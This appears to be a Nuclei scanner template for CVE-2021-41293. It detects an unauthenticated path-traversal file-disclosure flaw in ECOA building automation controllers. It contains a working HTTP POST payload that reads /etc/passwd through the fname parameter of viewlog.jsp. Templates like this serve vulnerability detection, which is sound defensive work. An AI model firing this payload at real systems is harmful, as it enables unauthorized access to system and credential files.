id: CVE-2021-41293

info:
  name: ECOA Building Automation System - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
  impact: |
    Unauthenticated attackers can read arbitrary files from the ECOA BAS controller including /etc/passwd via path traversal in the fname parameter, potentially exposing sensitive system configuration and credentials.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41293
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
    - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41293
    cwe-id: CWE-22
    epss-score: 0.20084
    epss-percentile: 0.97108
    cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ecoa
    product: ecs_router_controller-ecs_firmware
  tags: cve2021,cve,ecoa,lfi,disclosure,vkev,vuln

http:
  - raw:
      - |
        POST /viewlog.jsp HTTP/1.1
        Host: {{Hostname}}

        yr=2021&mh=6&fname=../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b03e4f0a3e6d73571ab4f248c32f1ba2ca105d9bc8601b1e9f073aaf4e05f80f022019f6a039902a9120d4a67a78f2050b713e37b9196fadc70671ca5dd937ae9d1b:922c64590222798bb761d5b6d8e72950